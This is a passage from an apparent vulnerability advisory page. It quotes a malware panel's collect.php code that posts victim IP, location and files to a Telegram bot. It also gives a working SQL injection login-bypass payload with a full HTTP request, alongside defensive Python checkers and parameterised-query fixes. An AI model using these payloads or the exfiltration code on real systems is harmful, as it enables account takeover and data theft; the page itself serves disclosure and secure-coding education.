Description: A MITM vector exists as the cURL request used when sending data to "api.telegram.org/bot" has CURLOPT_SSL_VERIFYPEER set to false. CURLOPT_SSL_VERIFYPEER checks that the remote certificate is valid, that it was issued by a CA you trust and that it is genuine.
Type: WebUI
MD5: 54530f88c8e4f4371c9418f00c256b1d
MD5: 8c003105229554557c75ec836b4fcf79 (collect.php)
Vuln ID: MVID-2022-0459
Disclosure: 01/19/2022

Exploit/PoC:
Vulnerable "collect.php" code snippet.

$desc = "_________________________ \r\n\n🏴 IP: " . $ip . "\n🌐 Country: " . $country . "\n🏠 City: " . $city . "\n🔧 Build: ". $Build[1] . "\r\n_________________________ \n\n" . $desc; // Add the IP and city
$url = "https://api.telegram.org/bot" . $token . "/sendDocument";
$document = new CURLFile(realpath($dest_path));
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, ["chat_id" => $chat_id, "document" => $document, "caption" => $desc]);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type:multipart/form-data"]);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$out = curl_exec($ch);
curl_close($ch);
</code></pre>
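<p>The single line <code>curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);</code> is the whole vulnerability, and it is the kind of setting that is easy to grep for in any PHP code base, not only in this panel. The checker below is an added example, not part of the advisory; it scans PHP text for <code>curl_setopt()</code> calls that set <code>CURLOPT_SSL_VERIFYPEER</code> to a false value or <code>CURLOPT_SSL_VERIFYHOST</code> to anything other than 2. The constructed samples are a condensed copy of the advisory's snippet and a corrected variant.</p>

```python
"""Find curl calls in PHP source that switch certificate checks off.

Added example, not part of the advisory. It scans PHP text for curl_setopt()
calls that set CURLOPT_SSL_VERIFYPEER to false/0 or CURLOPT_SSL_VERIFYHOST to
anything other than 2, the condition the advisory reports in collect.php.
The samples are constructed: a condensed copy of the advisory's snippet and
a corrected variant.
"""
import re

SETOPT_RE = re.compile(
    r"curl_setopt\s*\(\s*\$\w+\s*,\s*(CURLOPT_SSL_VERIFY(?:PEER|HOST))\s*,\s*([^)]+?)\s*\)",
    re.IGNORECASE,
)


def _is_off(option, value):
    """True when the value given for the option disables verification."""
    v = value.strip().lower()
    if option.upper() == "CURLOPT_SSL_VERIFYPEER":
        return v in {"false", "0", "null", "''", '""'}
    # VERIFYHOST must be 2 to check the host name in the certificate; 0, 1 and false do not.
    return v != "2"


def insecure_curl_lines(php_source):
    """Return [(line_number, option, value)] for each call that disables verification."""
    hits = []
    for n, line in enumerate(php_source.splitlines(), 1):
        for m in SETOPT_RE.finditer(line):
            option, value = m.group(1), m.group(2)
            if _is_off(option, value):
                hits.append((n, option.upper(), value.strip()))
    return hits


# Constructed sample: the advisory's snippet, reduced to the curl setup.
VULNERABLE = """$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$out = curl_exec($ch);
"""
# Constructed sample: the corrected setup, with both verification options explicit.
FIXED = """$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
$out = curl_exec($ch);
"""

if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE), ("fixed", FIXED)):
        print(label, insecure_curl_lines(src))
```

<p>Leaving <code>CURLOPT_SSL_VERIFYPEER</code> at its default (true) is equivalent to the fixed sample; the checker only flags explicit weakening, so a call that never mentions the option is not reported.</p>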
<pre><code># Exploit Title: Simple Subscription Website 1.0 - SQLi Authentication Bypass
# Exploit Author: Daniel Haro (Dirox)
# Vendor Homepage: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html
# Software Link: https://www.sourcecodester.com/php/15013/simple-subscription-website-admin-panel-php-and-sqlite-source-code.html
# Version: Simple Subscription Website 1.0
# Tested on: Windows, xampp
# CVE: CVE-2021-43140

- Description:
A SQL Injection vulnerability exists in Sourcecodester Simple Subscription Website 1.0. An account takeover is possible with the payload: admin' or 1=1-- -

PoC:

POST /plan_application/Actions.php?a=login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 57
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/plan_application/admin/login.php
Cookie: PHPSESSID=lcikn75hk4lk03t5onj0022mj3

username=admin'+or+1%3D1--+-&password=admin'+or+1%3D1--+-
</code></pre>
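<p>This login bypass and the Kmaleon <code>tipocomb</code> injection earlier on the page are the same defect in two forms: user input concatenated into SQL text. The example below is added here and is not the code of either application; it builds an in-memory SQLite database (the Simple Subscription Website ships on SQLite, so the comment syntax matches), runs the advisory's payload through a string-formatted login query and through a parameterised one, and shows the numeric-parameter case from the Kmaleon entry handled by coercion plus binding. Table and column names are assumptions for the example.</p>

```python
"""Login query built by string formatting versus a parameterised one.

Added example, not the application's code; it reproduces the class of bug
behind both SQL injection entries on this page (the login bypass here and the
'tipocomb' parameter earlier) against an in-memory SQLite database constructed
below. The payload is the one quoted in the advisory above. Passwords are kept
in plaintext only to keep the demo short; a real application stores a hash.
"""
import sqlite3

BYPASS = "admin' or 1=1-- -"   # payload from the advisory


def make_db():
    """Constructed sample data: one admin account and two appointment types."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'correct-horse-battery')")
    conn.execute("CREATE TABLE appointments (id INTEGER PRIMARY KEY, tipocomb INTEGER, note TEXT)")
    conn.executemany("INSERT INTO appointments (tipocomb, note) VALUES (?, ?)",
                     [(1, "public"), (2, "restricted")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Interpolates user input into SQL: the quote in the payload ends the string early
    and '-- ' comments out the password check, so the row is returned regardless."""
    sql = "SELECT id FROM users WHERE username = '%s' AND password = '%s'" % (username, password)
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password):
    """Bound parameters are data, never SQL; the same payload matches no row."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def appointments_by_type_safe(conn, tipocomb):
    """Numeric filter: coerce to int first, then bind. Non-numeric input such as
    '-9144 OR 6836=6836' is rejected instead of being interpolated."""
    try:
        type_id = int(tipocomb)
    except (TypeError, ValueError):
        return []
    rows = conn.execute("SELECT note FROM appointments WHERE tipocomb = ?", (type_id,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login with payload:", login_vulnerable(db, BYPASS, BYPASS))
    print("parameterised login with payload:", login_safe(db, BYPASS, BYPASS))
    print("tipocomb=2:", appointments_by_type_safe(db, "2"))
    print("tipocomb injected:", appointments_by_type_safe(db, "-9144 OR 6836=6836"))
```

<p>The same two fixes carry over to PHP: prepared statements with bound parameters (PDO or mysqli) for string values, and an explicit integer cast before binding for parameters like <code>tipocomb</code> that are only ever numeric.</p>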